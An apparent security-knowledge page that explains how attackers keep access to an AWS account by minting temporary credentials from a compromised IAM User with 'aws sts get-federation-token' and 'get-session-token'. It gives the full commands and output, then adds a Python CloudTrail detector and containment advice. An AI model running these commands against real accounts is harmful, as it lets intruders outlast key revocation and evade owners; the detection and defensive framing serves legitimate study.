Generating Temporary AWS Credentials from IAM User

AWS persistence technique

Overview

This is an access vector that threat actors use to avoid detection and maintain persistence. By generating temporary credentials from a compromised IAM User (the call can be repeated to hold several sets of credentials as backups), a threat actor keeps access to the target's AWS account after the original keys are gone.

  • The temporary credentials remain active even if the original compromised IAM User has had their access keys deactivated or deleted

  • The temporary credentials carry whatever permissions the compromised IAM User has at the moment they are used, so adding or removing permissions on the user also changes the temporary credentials' permissions

  • Neither API works with IAM Roles; both must be called with an IAM User's credentials


sts:GetFederationToken

The following command generates temporary credentials (valid for 15 minutes to 36 hours) from an IAM User.

  • You can specify any name you want; it does not need to be a real IAM User

  • You can specify any policy you want (up to 10 managed and/or inline policies), but the session never has more than the permissions of the user running the command, even if you pass it an administrator policy

aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "pZlpr[REDACTED]",
        "SessionToken": "IQoJb3J[REDACTED]",
        "Expiration": "2025-11-11T08:56:15+00:00"
    },
    "FederatedUser": {
        "FederatedUserId": "111111111111:sally",
        "Arn": "arn:aws:sts::111111111111:federated-user/sally"
    },
    "PackedPolicySize": 7
}

  • The credentials can be configured with aws --profile sally configure

aws --profile sally sts get-caller-identity
{
    "UserId": "111111111111:sally",
    "Account": "111111111111",
    "Arn": "arn:aws:sts::111111111111:federated-user/sally"
}

sts:GetSessionToken

The following command generates temporary credentials (valid for 15 minutes to 36 hours) from an IAM User. Unlike GetFederationToken it takes no name or policy, and the resulting session keeps the user's own identity.

aws --profile tyler sts get-session-token --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "PTBAG[REDACTED]",
        "SessionToken": "IQoJb3Jp[REDACTED]",
        "Expiration": "2025-11-10T08:47:10+00:00"
    }
}

  • The credentials can be configured with aws --profile tyler-backdoor configure

aws --profile tyler-backdoor sts get-caller-identity

{
    "UserId": "AIDA[REDACTED]",
    "Account": "111111111111",
    "Arn": "arn:aws:iam::111111111111:user/tyler"
}
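Both calls above are logged by CloudTrail under the sts.amazonaws.com event source, which is where a defender catches this technique. The following is an added detection example, not code from the original page: it scans constructed CloudTrail-style records for GetFederationToken and GetSessionToken calls and flags the traits the page describes, a long duration, a federated name that matches no real IAM User, and an administrator policy passed as the session policy. It then lists which federated-user ARNs went on to make API calls. The record shapes, the 12-hour threshold, the IP addresses and the list of known users are assumptions for the example.

```python
"""Flag sts:GetFederationToken / sts:GetSessionToken activity in CloudTrail records.

Added example (not from the page). Records below are constructed to mirror the
page's output; the 12-hour threshold and known-user list are assumptions.
"""
from dataclasses import dataclass, field

STS_SOURCE = "sts.amazonaws.com"
WATCHED_CALLS = {"GetFederationToken", "GetSessionToken"}
MAX_EXPECTED_DURATION = 12 * 3600  # assumption: sessions longer than 12 h are unusual here

# Constructed sample records in CloudTrail's shape (values are placeholders).
SAMPLE_RECORDS = [
    {
        "eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
        "eventTime": "2025-11-09T20:56:15Z", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "tyler",
                         "accessKeyId": "AKIA[REDACTED]"},
        "requestParameters": {"name": "sally", "durationSeconds": 129600,
                              "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
    },
    {
        "eventSource": "sts.amazonaws.com", "eventName": "GetSessionToken",
        "eventTime": "2025-11-08T20:47:10Z", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "tyler",
                         "accessKeyId": "AKIA[REDACTED]"},
        "requestParameters": {"durationSeconds": 129600},
    },
    {   # later activity by the minted federated user
        "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
        "eventTime": "2025-11-10T01:02:03Z", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "FederatedUser",
                         "arn": "arn:aws:sts::111111111111:federated-user/sally"},
        "requestParameters": None,
    },
    {   # benign call that should not be flagged
        "eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
        "eventTime": "2025-11-10T09:00:00Z", "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "IAMUser", "userName": "tyler"},
        "requestParameters": None,
    },
]


@dataclass
class Finding:
    event_name: str
    caller: str
    event_time: str
    reasons: list = field(default_factory=list)


def analyze_token_calls(records, known_users, max_duration=MAX_EXPECTED_DURATION):
    """Return one Finding per GetFederationToken/GetSessionToken call, with reasons."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != STS_SOURCE or rec.get("eventName") not in WATCHED_CALLS:
            continue
        ident = rec.get("userIdentity") or {}
        params = rec.get("requestParameters") or {}
        # Baseline: temporary credentials minted from an IAM User's long-term keys;
        # they outlive key deactivation, so every call deserves a look.
        reasons = ["temporary credentials minted from an IAM User's long-term keys"]
        duration = params.get("durationSeconds")
        if duration is not None and duration > max_duration:
            reasons.append(f"durationSeconds={duration} exceeds {max_duration}")
        if rec["eventName"] == "GetFederationToken":
            name = params.get("name")
            if name and name not in known_users:
                reasons.append(f"federated name {name!r} matches no IAM User")
            arns = [p.get("arn", "") for p in params.get("policyArns", [])]
            if any(a.endswith("/AdministratorAccess") for a in arns):
                reasons.append("AdministratorAccess passed as session policy")
        findings.append(Finding(rec["eventName"], ident.get("userName", "?"),
                                rec.get("eventTime", ""), reasons))
    return findings


def federated_users_seen(records):
    """Federated-user ARNs that made API calls (sessions minted via GetFederationToken)."""
    return sorted({r["userIdentity"].get("arn", "") for r in records
                   if (r.get("userIdentity") or {}).get("type") == "FederatedUser"})


if __name__ == "__main__":
    for f in analyze_token_calls(SAMPLE_RECORDS, known_users={"tyler"}):
        print(f.event_time, f.event_name, "by", f.caller)
        for r in f.reasons:
            print("   -", r)
    print("federated users active:", federated_users_seen(SAMPLE_RECORDS))
```

Because the sessions inherit the user's permissions at the time of use (as the page notes), containment after a hit is a permission change on the compromised IAM User, or deletion of the user, rather than only rotating or deactivating its access keys.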
